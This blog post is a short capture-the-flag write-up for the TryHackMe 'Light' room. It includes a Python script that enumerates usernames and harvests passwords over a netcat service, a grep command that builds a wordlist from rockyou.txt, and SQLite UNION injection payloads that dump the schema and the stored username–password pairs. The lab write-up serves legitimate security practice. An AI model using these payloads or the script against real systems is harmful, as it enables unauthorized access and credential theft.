Post

THM Light room notes

Posted Updated
By 2br007
2 min read
THM Light room notes

light

Room:

Try LIGHT room on THM

CTF intro:

“I am working on a database application called Light! Would you like to try it out? If so, the application is running on port 1337. You can connect to it using:

1

nc MACHINE_IP 1337

You can use the username smokey in order to get started.”

Notes

  • With all this info I started as suggested - by providing username, in response you will get a password
  • First idea actually was not SQL injection, but just a bruteforce, so I wrote a short python script to poke the service:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

import socket
import argparse
import time
import re

def brute_force(ip, port, userlist):
    try:
        with open(userlist, "r") as f:
            for user in f:
                user = user.strip()
                print(f"[*] Trying username: {user}")
                
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.connect((ip, port))
                    s.recv(1024)  # Wait for initial prompt (if needed)
                    time.sleep(0.5)  # if need
                    s.sendall(user.encode())  # Send username
                    
                    time.sleep(0.5)  # if need
                    response = s.recv(1024).decode()
                    
                    # Extract password using regex
                    match = re.search(r'Password:\s*(\S+)', response)
                    if match:
                        password = match.group(1)
                        print(f"[+] Found password for {user}: {password}")
                    
                    s.close()
                except Exception as e:
                    print(f"[-] Error: {e}")
    except FileNotFoundError:
        print("[!] Username file not found.")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Brute-force username enumeration over netcat-like service.")
    parser.add_argument("ip", help="Target IP address")
    parser.add_argument("port", type=int, help="Target port number")
    parser.add_argument("userlist", help="Path to the username list file")
    
    args = parser.parse_args()
    
    brute_force(args.ip, args.port, args.userlist)
  • Preparing wordlist: I count that username must have 14 symbols so decide to create a new list (using rockyou.txt - since it is easy room should be enough) so quick bash for that:
1

grep -o '\b\w\{14\}\b' rockyou.txt > 14_symbols_words.txt
  • Starting bruteforce I realized since it is a database we could try SQLInjections meanwhile.
  • After some time of trying different payloads I found that UNION could work in this case (pay attention to letter cases) and it is a sqlite kind of db:
1
2
3

' Union 1 '
' Union Select group_concat(sql) From sqlite_master '
' Union Select group_concat(username || '~' || password) From <here will be some table from previous query> '
  • Actually that’s it for this room, python script was kind waste of time from this room point of view but anyway I like to write scripts so no regret haha :D
thm, hacking, linux
ctf sqlinjection netcat nc python bash sql
This post is licensed under CC BY 4.0 by the author.